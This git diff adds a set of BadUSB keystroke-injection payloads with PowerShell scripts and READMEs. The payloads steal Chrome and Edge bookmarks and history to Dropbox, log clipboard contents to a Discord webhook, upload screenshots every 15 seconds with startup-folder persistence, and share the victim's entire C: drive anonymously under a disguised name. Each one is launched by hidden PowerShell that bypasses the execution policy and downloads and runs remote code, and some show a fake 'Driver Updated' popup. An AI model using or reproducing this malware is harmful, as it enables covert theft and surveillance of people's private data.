diff --git a/BadUSB/Bookmark-Hog/BH.ps1 b/BadUSB/Bookmark-Hog/BH.ps1
new file mode 100644
index 00000000..5b8f1cdc
--- /dev/null
+++ b/BadUSB/Bookmark-Hog/BH.ps1
@@ -0,0 +1,63 @@
+#Bookmark-Hog
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
+ try {
+ Write-Host "The chrome bookmark file has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+ }
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+ $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
+ Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
+ }
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
+ try {
+ Write-Host "The edge bookmark file has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+}
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+ $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
+ Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
+}
+
+function DropBox-Upload {
+
+ [CmdletBinding()]
+ param (
+
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("f")]
+ [string]$SourceFilePath
+ )
+ $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
+ $outputFile = Split-Path $SourceFilePath -leaf
+ $TargetFilePath="/$outputFile"
+ $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+ $authorization = "Bearer " + $DropBoxAccessToken
+ $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+ $headers.Add("Authorization", $authorization)
+ $headers.Add("Dropbox-API-Arg", $arg)
+ $headers.Add("Content-Type", 'application/octet-stream')
+ Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+ }
+
+DropBox-Upload -f "$env:tmp/$F1"
+DropBox-Upload -f "$env:tmp/$F2"
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
diff --git a/BadUSB/Bookmark-Hog/README.md b/BadUSB/Bookmark-Hog/README.md
new file mode 100644
index 00000000..8ebcf887
--- /dev/null
+++ b/BadUSB/Bookmark-Hog/README.md
@@ -0,0 +1,111 @@
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Bookmark-Hog
+
+A payload to exfiltrate bookmarks of the 2 most popular browsers
+
+## Description
+
+This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
+
+These files will be saved to the temp directory
+
+Finally dropbox will be used to exfiltrate the files to cloud storage
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/BadUSB/Bookmark-Hog/payload.txt b/BadUSB/Bookmark-Hog/payload.txt
new file mode 100644
index 00000000..17ce970b
--- /dev/null
+++ b/BadUSB/Bookmark-Hog/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Bookmark-Hog
+
+REM Author: atomiczsec
+
+REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
+
+REM Target: Windows 10, 11
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
diff --git a/BadUSB/Copy-And-Waste/I.bat b/BadUSB/Copy-And-Waste/I.bat
new file mode 100644
index 00000000..665c9be9
--- /dev/null
+++ b/BadUSB/Copy-And-Waste/I.bat
@@ -0,0 +1,3 @@
+@echo off
+powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
+pause
diff --git a/BadUSB/Copy-And-Waste/README.md b/BadUSB/Copy-And-Waste/README.md
new file mode 100644
index 00000000..93c4db2b
--- /dev/null
+++ b/BadUSB/Copy-And-Waste/README.md
@@ -0,0 +1,119 @@
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Copy-And-Waste
+
+A payload to exfiltrate clipboard contents
+
+## Description
+
+This payload uses iwr to download 2 files
+* I.bat
+* c.ps1
+
+**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
+
+**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
+
+Then the contents will then be sent to the discord webhook for viewing pleasure
+
+For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
+
+
+## Getting Started
+
+### Dependencies
+
+* Pastebin or other file sharing service, Discord webhook or other webhook service
+* Windows 10,11
+* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Device will download both files and place them in proper directories to then run the script
+```
+powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here:
+
+[atomiczsec](https://github.com/atomiczsec) &
+[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/BadUSB/Copy-And-Waste/c.ps1 b/BadUSB/Copy-And-Waste/c.ps1
new file mode 100644
index 00000000..0215ae3b
--- /dev/null
+++ b/BadUSB/Copy-And-Waste/c.ps1
@@ -0,0 +1,36 @@
+Add-Type -AssemblyName WindowsBase
+Add-Type -AssemblyName PresentationCore
+
+function dischat {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=0,Mandatory = $True)]
+ [string]$con
+ )
+
+ $hookUrl = 'YOUR DISCORD WEBHOOK'
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $con
+}
+
+
+Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
+
+}
+
+
+dischat (get-clipboard)
+
+while (1){
+ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
+ $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
+ $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
+ $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
+
+ if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
+ elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
+ else {continue}
+}
\ No newline at end of file
diff --git a/BadUSB/Copy-And-Waste/payload.txt b/BadUSB/Copy-And-Waste/payload.txt
new file mode 100644
index 00000000..a44aae6f
--- /dev/null
+++ b/BadUSB/Copy-And-Waste/payload.txt
@@ -0,0 +1,17 @@
+REM Title: Copy-And-Waste
+
+REM Author: atomiczsec & I am Jakoby
+
+REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
+
+REM Target: Windows 10, 11
+
+DELAY 2000
+GUI
+DELAY
+STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+ENTER
+
+REM Remember to replace the link with your pastebin shared link for the intended files to download
+REM Also remember to put in your discord webhook in c.ps1
+REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
\ No newline at end of file
diff --git a/BadUSB/Copy-And-Waste/placeholder b/BadUSB/Copy-And-Waste/placeholder
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/BadUSB/Copy-And-Waste/placeholder
@@ -0,0 +1 @@
+
diff --git a/BadUSB/History-Pig/HP.ps1 b/BadUSB/History-Pig/HP.ps1
new file mode 100644
index 00000000..42443b43
--- /dev/null
+++ b/BadUSB/History-Pig/HP.ps1
@@ -0,0 +1,63 @@
+#History-Pig
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
+ try {
+ Write-Host "The Chrome History file has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+ }
+ # Copy Chrome History to Temp Directory to get sent to Dropbox
+ else {
+ $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
+ Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
+ }
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
+ try {
+ Write-Host "The Edge History file has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+}
+ # Copy Edge History to Temp Directory to get sent to Dropbox
+ else {
+ $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
+ Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
+}
+
+function DropBox-Upload {
+
+ [CmdletBinding()]
+ param (
+
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("f")]
+ [string]$SourceFilePath
+ )
+ $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
+ $outputFile = Split-Path $SourceFilePath -leaf
+ $TargetFilePath="/$outputFile"
+ $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+ $authorization = "Bearer " + $DropBoxAccessToken
+ $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+ $headers.Add("Authorization", $authorization)
+ $headers.Add("Dropbox-API-Arg", $arg)
+ $headers.Add("Content-Type", 'application/octet-stream')
+ Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+ }
+
+DropBox-Upload -f "$env:tmp/$F1"
+DropBox-Upload -f "$env:tmp/$F2"
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
diff --git a/BadUSB/History-Pig/README.md b/BadUSB/History-Pig/README.md
new file mode 100644
index 00000000..b8552e81
--- /dev/null
+++ b/BadUSB/History-Pig/README.md
@@ -0,0 +1,109 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# History-Pig
+
+A payload to exfiltrate the history of the 2 most popular browsers
+
+## Description
+
+This payload will enumerate through the browser directories, looking for the file that stores the history
+
+These files will be saved to the temp directory
+
+Finally dropbox will be used to exfiltrate the files to cloud storage
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/BadUSB/History-Pig/payload.txt b/BadUSB/History-Pig/payload.txt
new file mode 100644
index 00000000..91224b20
--- /dev/null
+++ b/BadUSB/History-Pig/payload.txt
@@ -0,0 +1,16 @@
+REM Title: History-Pig
+
+REM Author: atomiczsec
+
+REM Description: This payload is meant to exfiltrate browsers history to a dropbox
+
+REM Target: Windows 10, 11
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
diff --git a/BadUSB/Pwn-Drive/README.md b/BadUSB/Pwn-Drive/README.md
new file mode 100644
index 00000000..c3211bb1
--- /dev/null
+++ b/BadUSB/Pwn-Drive/README.md
@@ -0,0 +1,107 @@
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Pwn-Drive
+
+A payload to share the victims "C:" drive to the network.
+
+## Description
+
+This payload will share the entire victims "C:" drive to the entire network for further exploitation.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/BadUSB/Pwn-Drive/c.ps1 b/BadUSB/Pwn-Drive/c.ps1
new file mode 100644
index 00000000..798b9eea
--- /dev/null
+++ b/BadUSB/Pwn-Drive/c.ps1
@@ -0,0 +1,14 @@
+#Pwn-Drive
+
+#Enable Network Discovery
+netsh advfirewall firewall set rule group=”network discovery” new enable=yes
+
+#Enable File and Print
+netsh firewall set service type=fileandprint mode=enable profile=all
+
+#Setting Registry Values for allowing access to drive without credentials
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
+
+#Sharing the Drive
+New-SmbShare -Name "Windows Update" -Path "C:\"
\ No newline at end of file
diff --git a/BadUSB/Pwn-Drive/payload.txt b/BadUSB/Pwn-Drive/payload.txt
new file mode 100644
index 00000000..a5dd5245
--- /dev/null
+++ b/BadUSB/Pwn-Drive/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Pwn-Drive
+
+REM Author: atomiczsec
+
+REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
diff --git a/BadUSB/Screen-Shock/I.bat b/BadUSB/Screen-Shock/I.bat
new file mode 100644
index 00000000..665c9be9
--- /dev/null
+++ b/BadUSB/Screen-Shock/I.bat
@@ -0,0 +1,3 @@
+@echo off
+powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
+pause
diff --git a/BadUSB/Screen-Shock/README.md b/BadUSB/Screen-Shock/README.md
new file mode 100644
index 00000000..a53c03fd
--- /dev/null
+++ b/BadUSB/Screen-Shock/README.md
@@ -0,0 +1,117 @@
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Screen-Shock
+
+This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
+
+## Description
+
+This payload uses iwr to download 2 files
+* I.bat
+* c.ps1
+
+**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
+
+**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds
+
+Then the contents will then be sent to the DropBox for viewing pleasure
+
+
+
+## Getting Started
+
+### Dependencies
+
+* Pastebin or other file sharing service, Dropbox
+* Windows 10
+* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Device will download both files and place them in proper directories to then run the script
+```
+powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here:
+
+[atomiczsec](https://github.com/atomiczsec)
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/BadUSB/Screen-Shock/c.ps1 b/BadUSB/Screen-Shock/c.ps1
new file mode 100644
index 00000000..ef43687a
--- /dev/null
+++ b/BadUSB/Screen-Shock/c.ps1
@@ -0,0 +1,45 @@
+function DropBox-Upload {
+
+[CmdletBinding()]
+param (
+
+[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+[Alias("f")]
+[string]$SourceFilePath
+)
+$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
+$outputFile = Split-Path $SourceFilePath -leaf
+$TargetFilePath="/$outputFile"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $DropBoxAccessToken
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+while(1){
+
+ Add-Type -AssemblyName System.Windows.Forms,System.Drawing
+
+ $screens = [Windows.Forms.Screen]::AllScreens
+
+ $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
+ $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
+ $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
+ $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
+
+ $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
+ $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
+ $graphics = [Drawing.Graphics]::FromImage($bmp)
+
+ $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
+
+ $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
+ $graphics.Dispose()
+ $bmp.Dispose()
+
+ start-sleep -Seconds 15
+ "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
+}
\ No newline at end of file
diff --git a/BadUSB/Screen-Shock/payload.txt b/BadUSB/Screen-Shock/payload.txt
new file mode 100644
index 00000000..d7513965
--- /dev/null
+++ b/BadUSB/Screen-Shock/payload.txt
@@ -0,0 +1,17 @@
+REM Title: Screen-Shock
+
+REM Author: atomiczsec
+
+REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI
+DELAY
+STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+ENTER
+
+REM Remember to replace the link with your pastebin shared link for the intended files to download
+REM Also remember to put in your discord webhook in c.ps1
+REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
\ No newline at end of file
diff --git a/BadUSB/Screen-Shock/placeholder b/BadUSB/Screen-Shock/placeholder
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/BadUSB/Screen-Shock/placeholder
@@ -0,0 +1 @@
+
diff --git a/BadUSB/Water-UnMark/README.md b/BadUSB/Water-UnMark/README.md
new file mode 100644
index 00000000..c1b36160
--- /dev/null
+++ b/BadUSB/Water-UnMark/README.md
@@ -0,0 +1,103 @@
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Water-UnMark
+
+A payload to get rid of the ugly windows activation watermark.
+
+## Description
+This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
+
+## Getting Started
+
+### Dependencies
+
+* Unactivated Windows 10
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+```
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here:
+
+[atomiczsec](https://github.com/atomiczsec)
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/BadUSB/Water-UnMark/payload.txt b/BadUSB/Water-UnMark/payload.txt
new file mode 100644
index 00000000..e57c6d7b
--- /dev/null
+++ b/BadUSB/Water-UnMark/payload.txt
@@ -0,0 +1,17 @@
+REM Title: Water-UnMark
+REM Author: atomiczsec
+REM Target OS: Windows 10
+REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
+
+DELAY 2000
+GUI r
+DELAY 100
+STRING powershell Start-Process powershell -verb runAs
+DELAY 1000
+ALT Y
+DELAY 1000
+STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
+ENTER
+DELAY 100
+STRING Restart-Computer -Force
+ENTER
diff --git a/BadUSB/Water-UnMark/placeholder b/BadUSB/Water-UnMark/placeholder
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/BadUSB/Water-UnMark/placeholder
@@ -0,0 +1 @@
+